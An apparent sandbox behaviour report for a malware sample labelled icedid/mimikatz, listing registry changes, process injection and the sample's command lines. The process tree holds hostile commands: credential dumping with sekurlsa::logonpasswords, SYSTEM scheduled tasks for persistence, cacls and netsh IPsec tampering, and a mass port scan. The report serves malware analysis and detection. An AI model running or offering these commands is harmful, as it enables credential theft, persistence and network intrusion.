\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bzbnzbyct.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2336 cmd.exe 2592 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x0007000000023c72-6.dat nsis_installer_2 behavioral2/files/0x0007000000023c88-14.dat nsis_installer_1 behavioral2/files/0x0007000000023c88-14.dat nsis_installer_2 -
Modifies data under HKEY_USERS 45 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ tmyfwky.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" tmyfwky.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" tmyfwky.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" tmyfwky.exe Key created \REGISTRY\USER\.DEFAULT\Software cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing tmyfwky.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" tmyfwky.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" tmyfwky.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2592 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2444 schtasks.exe 1980 schtasks.exe 2332 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 3692 2025-01-18_71aeff8b628730c816bab46cf2ba262d_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 3692 2025-01-18_71aeff8b628730c816bab46cf2ba262d_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 2844 tmyfwky.exe Token: SeDebugPrivilege 2088 tmyfwky.exe Token: SeDebugPrivilege 640 vfshost.exe Token: SeDebugPrivilege 2924 cmzbnyytn.exe Token: SeLockMemoryPrivilege 3316 lfbpkn.exe Token: SeLockMemoryPrivilege 3316 lfbpkn.exe Token: SeDebugPrivilege 1368 cmzbnyytn.exe Token: SeDebugPrivilege 4360 cmzbnyytn.exe Token: SeDebugPrivilege 3980 cmzbnyytn.exe Token: SeDebugPrivilege 5052 cmzbnyytn.exe Token: SeDebugPrivilege 3060 cmzbnyytn.exe Token: SeDebugPrivilege 4992 cmzbnyytn.exe Token: SeDebugPrivilege 4392 cmzbnyytn.exe Token: SeDebugPrivilege 2424 cmzbnyytn.exe Token: SeDebugPrivilege 1388 cmzbnyytn.exe Token: SeDebugPrivilege 1112 cmzbnyytn.exe Token: SeDebugPrivilege 2704 cmzbnyytn.exe Token: SeDebugPrivilege 4468 cmzbnyytn.exe Token: SeDebugPrivilege 1968 cmzbnyytn.exe Token: SeDebugPrivilege 4360 cmzbnyytn.exe Token: SeDebugPrivilege 1080 cmzbnyytn.exe Token: SeDebugPrivilege 1240 cmzbnyytn.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 3692 2025-01-18_71aeff8b628730c816bab46cf2ba262d_hacktools_icedid_mimikatz.exe 3692 2025-01-18_71aeff8b628730c816bab46cf2ba262d_hacktools_icedid_mimikatz.exe 2844 tmyfwky.exe 2844 tmyfwky.exe 2088 tmyfwky.exe 2088 tmyfwky.exe 4300 xohudmc.exe 3236 mesueu.exe 4912 tmyfwky.exe 4912 tmyfwky.exe 4708 tmyfwky.exe 4708 tmyfwky.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3692 wrote to memory of 2336 3692 2025-01-18_71aeff8b628730c816bab46cf2ba262d_hacktools_icedid_mimikatz.exe 83 PID 3692 wrote to memory of 2336 3692 2025-01-18_71aeff8b628730c816bab46cf2ba262d_hacktools_icedid_mimikatz.exe 83 PID 3692 wrote to memory of 2336 3692 2025-01-18_71aeff8b628730c816bab46cf2ba262d_hacktools_icedid_mimikatz.exe 83 PID 2336 wrote to memory of 2592 2336 cmd.exe 85 PID 2336 wrote to memory of 2592 2336 cmd.exe 85 PID 2336 wrote to memory of 2592 2336 cmd.exe 85 PID 2336 wrote to memory of 2844 2336 cmd.exe 89 PID 2336 wrote to memory of 2844 2336 cmd.exe 89 PID 2336 wrote to memory of 2844 2336 cmd.exe 89 PID 2088 wrote to memory of 1048 2088 tmyfwky.exe 91 PID 2088 wrote to memory of 1048 2088 tmyfwky.exe 91 PID 2088 wrote to memory of 1048 2088 tmyfwky.exe 91 PID 1048 wrote to memory of 4084 1048 cmd.exe 94 PID 1048 wrote to memory of 4084 1048 cmd.exe 94 PID 1048 wrote to memory of 4084 1048 cmd.exe 94 PID 1048 wrote to memory of 2588 1048 cmd.exe 96 PID 1048 wrote to memory of 2588 1048 cmd.exe 96 PID 1048 wrote to memory of 2588 1048 cmd.exe 96 PID 1048 wrote to memory of 4392 1048 cmd.exe 97 PID 1048 wrote to memory of 4392 1048 cmd.exe 97 PID 1048 wrote to memory of 4392 1048 cmd.exe 97 PID 1048 wrote to memory of 2488 1048 cmd.exe 98 PID 1048 wrote to memory of 2488 1048 cmd.exe 98 PID 1048 wrote to memory of 2488 1048 cmd.exe 98 PID 1048 wrote to memory of 2756 1048 cmd.exe 99 PID 1048 wrote to memory of 2756 1048 cmd.exe 99 PID 1048 wrote to memory of 2756 1048 cmd.exe 99 PID 1048 wrote to memory of 2044 1048 cmd.exe 100 PID 1048 wrote to memory of 2044 1048 cmd.exe 100 PID 1048 wrote to memory of 2044 1048 cmd.exe 100 PID 2088 wrote to memory of 3052 2088 tmyfwky.exe 102 PID 2088 wrote to memory of 3052 2088 tmyfwky.exe 102 PID 2088 wrote to memory of 3052 2088 tmyfwky.exe 102 PID 2088 wrote to memory of 3204 2088 tmyfwky.exe 105 PID 2088 wrote to memory of 3204 2088 tmyfwky.exe 105 PID 2088 wrote to memory of 3204 2088 tmyfwky.exe 105 PID 2088 wrote to memory of 4696 2088 tmyfwky.exe 107 PID 2088 wrote to memory of 4696 2088 tmyfwky.exe 107 PID 2088 wrote to memory of 4696 2088 tmyfwky.exe 107 PID 2088 wrote to memory of 2368 2088 tmyfwky.exe 115 PID 2088 wrote to memory of 2368 2088 tmyfwky.exe 115 PID 2088 wrote to memory of 2368 2088 tmyfwky.exe 115 PID 2368 wrote to memory of 4792 2368 cmd.exe 117 PID 2368 wrote to memory of 4792 2368 cmd.exe 117 PID 2368 wrote to memory of 4792 2368 cmd.exe 117 PID 4792 wrote to memory of 4200 4792 wpcap.exe 118 PID 4792 wrote to memory of 4200 4792 wpcap.exe 118 PID 4792 wrote to memory of 4200 4792 wpcap.exe 118 PID 4200 wrote to memory of 1984 4200 net.exe 120 PID 4200 wrote to memory of 1984 4200 net.exe 120 PID 4200 wrote to memory of 1984 4200 net.exe 120 PID 4792 wrote to memory of 908 4792 wpcap.exe 121 PID 4792 wrote to memory of 908 4792 wpcap.exe 121 PID 4792 wrote to memory of 908 4792 wpcap.exe 121 PID 908 wrote to memory of 4916 908 net.exe 123 PID 908 wrote to memory of 4916 908 net.exe 123 PID 908 wrote to memory of 4916 908 net.exe 123 PID 4792 wrote to memory of 1360 4792 wpcap.exe 124 PID 4792 wrote to memory of 1360 4792 wpcap.exe 124 PID 4792 wrote to memory of 1360 4792 wpcap.exe 124 PID 1360 wrote to memory of 868 1360 net.exe 126 PID 1360 wrote to memory of 868 1360 net.exe 126 PID 1360 wrote to memory of 868 1360 net.exe 126 PID 4792 wrote to memory of 5072 4792 wpcap.exe 127
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2116
-
C:\Windows\TEMP\dvfzrticv\lfbpkn.exe"C:\Windows\TEMP\dvfzrticv\lfbpkn.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3316
-
-
C:\Users\Admin\AppData\Local\Temp\2025-01-18_71aeff8b628730c816bab46cf2ba262d_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2025-01-18_71aeff8b628730c816bab46cf2ba262d_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3692 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\cbdnbivt\tmyfwky.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2336 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2592
-
-
C:\Windows\cbdnbivt\tmyfwky.exeC:\Windows\cbdnbivt\tmyfwky.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2844
-
-
-
C:\Windows\cbdnbivt\tmyfwky.exeC:\Windows\cbdnbivt\tmyfwky.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2088 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1048 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4084
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:2588
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4392
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:2488
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2756
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:2044
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3052
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3204
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4696
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\itcctjlje\unptrtjvi\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Windows\itcctjlje\unptrtjvi\wpcap.exeC:\Windows\itcctjlje\unptrtjvi\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4792 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4200 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:1984
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:908 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:4916
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1360 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:868
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:5072 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:4068
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:540 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:4948
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:4844
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:1460 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:2944
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:4448
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\itcctjlje\unptrtjvi\bzbnzbyct.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\itcctjlje\unptrtjvi\Scant.txt2⤵PID:3216
-
C:\Windows\itcctjlje\unptrtjvi\bzbnzbyct.exeC:\Windows\itcctjlje\unptrtjvi\bzbnzbyct.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\itcctjlje\unptrtjvi\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2588
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\itcctjlje\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\itcctjlje\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4464 -
C:\Windows\itcctjlje\Corporate\vfshost.exeC:\Windows\itcctjlje\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:640
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "abdndmbcd" /ru system /tr "cmd /c C:\Windows\ime\tmyfwky.exe"2⤵
- System Location Discovery: System Language Discovery
PID:1172 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3928
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "abdndmbcd" /ru system /tr "cmd /c C:\Windows\ime\tmyfwky.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2444
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "biicucyni" /ru system /tr "cmd /c echo Y|cacls C:\Windows\cbdnbivt\tmyfwky.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:1932 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1696
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "biicucyni" /ru system /tr "cmd /c echo Y|cacls C:\Windows\cbdnbivt\tmyfwky.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2332
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tknlleieq" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\dvfzrticv\lfbpkn.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:4644 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4136
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "tknlleieq" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\dvfzrticv\lfbpkn.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1980
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1828
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5080
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
